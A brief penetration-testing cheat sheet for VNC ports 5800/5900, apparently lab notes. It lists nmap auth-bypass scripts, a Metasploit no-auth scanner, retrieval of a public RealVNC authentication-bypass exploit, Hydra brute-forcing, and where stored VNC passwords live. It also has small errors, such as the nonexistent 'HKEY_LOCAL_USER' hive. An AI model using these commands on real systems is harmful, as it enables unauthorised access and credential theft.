VNC 5800 5900
#nmap
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5800 10.11.1.13
#metasploit
use auxiliary/scanner/vnc/vnc_none_auth set rhosts 10.11.1.13 set rport 5800 set threads 1 run
#RealVNC 4.1.0/4.1.1 - Authentication Bypass - Exploit will prompt for target IP
sudo searchsploit -m windows/remote/36932.py
python2 36932.py #input target IP
Shell
#hydra
hydra -L <USERS_LIST> –P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV
#Password default location
Linux
Default password is stored in: ~/.vnc/passwd
Windows
# RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
# TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Last updated